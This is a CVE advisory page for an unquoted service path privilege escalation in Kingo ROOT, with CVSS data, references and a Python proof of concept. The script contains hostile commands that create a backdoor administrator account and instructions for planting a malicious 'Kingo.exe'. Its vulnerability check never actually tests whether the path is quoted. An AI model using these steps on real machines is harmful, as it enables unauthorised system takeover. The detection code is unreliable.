CVE-2025-57227

Description

An unquoted service path in Kingosoft Technology Ltd Kingo ROOT v1.5.8.3353 allows attackers to escalate privileges via placing a crafted executable file into a parent folder.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Kingo ROOT v1.5.8.3353

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-57227 PoC - Unquoted Service Path Privilege Escalation
# Target: Kingo ROOT v1.5.8.3353
# Author: Security Researcher
# Note: This is for educational and authorized testing purposes only

import os
import sys
import shutil
import subprocess

def check_vulnerability():
    """Check if the system is vulnerable to CVE-2025-57227"""
    print("[*] Checking for vulnerable Kingo ROOT installation...")
    
    # Common installation paths for Kingo ROOT
    potential_paths = [
        r"C:\Program Files\Kingo ROOT",
        r"C:\Program Files (x86)\Kingo ROOT",
        r"C:\Kingo ROOT"
    ]
    
    vulnerable_paths = []
    for path in potential_paths:
        if os.path.exists(path):
            print(f"[+] Found Kingo ROOT installation at: {path}")
            # Check if service path is unquoted
            service_exe = os.path.join(path, "bin", "service.exe")
            if os.path.exists(service_exe):
                print(f"[+] Service executable found: {service_exe}")
                vulnerable_paths.append(path)
    
    return vulnerable_paths

def create_payload(payload_path):
    """Create a malicious executable to replace the service"""
    print(f"[*] Creating payload at: {payload_path}")
    
    # Create a simple C program that creates a reverse shell or adds admin user
    # This is a placeholder - actual payload would be compiled binary
    payload_code = '''
#include <windows.h>
#include <stdlib.h>

int main() {
    // This payload would execute with SYSTEM privileges
    // Example: Create a new administrator user
    system("net user hacker P@ssw0rd123 /add");
    system("net localgroup administrators hacker /add");
    
    // Then execute the legitimate service
    // ShellExecute(NULL, "open", "C:\\\\Program Files\\\\Kingo ROOT\\\\bin\\\\service.exe", NULL, NULL, SW_HIDE);
    
    return 0;
}
'''
    
    # In real attack, this would be a compiled executable
    print("[!] Note: This PoC requires a compiled malicious executable")
    print("[!] The payload should be named 'Kingo.exe' and placed in parent directory")
    return True

def exploit(vulnerable_path):
    """Exploit the unquoted service path vulnerability"""
    print(f"[*] Exploiting unquoted service path at: {vulnerable_path}")
    
    # The vulnerable path is: C:\Program Files\Kingo ROOT\bin\service.exe
    # Attack vector: Place malicious 'Kingo.exe' in C:\Program Files\
    
    parent_dir = os.path.dirname(vulnerable_path.rstrip('\\'))
    malicious_exe = os.path.join(parent_dir, "Kingo.exe")
    
    print(f"[+] Target malicious executable location: {malicious_exe}")
    print("[+] Check write permissions to parent directory")
    
    # Check if we can write to parent directory
    try:
        test_file = os.path.join(parent_dir, "test_write.tmp")
        with open(test_file, 'w') as f:
            f.write("test")
        os.remove(test_file)
        print("[+] Write permission confirmed")
    except:
        print("[-] No write permission to parent directory")
        return False
    
    print("[*] To complete exploitation:")
    print(f"    1. Place compiled malicious executable as: {malicious_exe}")
    print("    2. Wait for service restart or trigger: sc stop KingoService && sc start KingoService")
    print("    3. Malicious code will execute with SYSTEM privileges")
    
    return True

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-57227 PoC - Kingo ROOT Unquoted Service Path")
    print("=" * 60)
    
    vulnerable_paths = check_vulnerability()
    
    if vulnerable_paths:
        for path in vulnerable_paths:
            exploit(path)
    else:
        print("[-] No vulnerable Kingo ROOT installation found")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-57227
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-57227
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-57227/
[4] VulDB https://vuldb.com/cve/CVE-2025-57227
[5] https://www.exploit-db.com/exploits/51707

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-57227", "sourceIdentifier": "[email protected]", "published": "2025-10-29T18:15:41.393", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An unquoted service path in Kingosoft Technology Ltd Kingo ROOT v1.5.8.3353 allows attackers to escalate privileges via placing a crafted executable file into a parent folder."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/51707", "source": "[email protected]"}]}}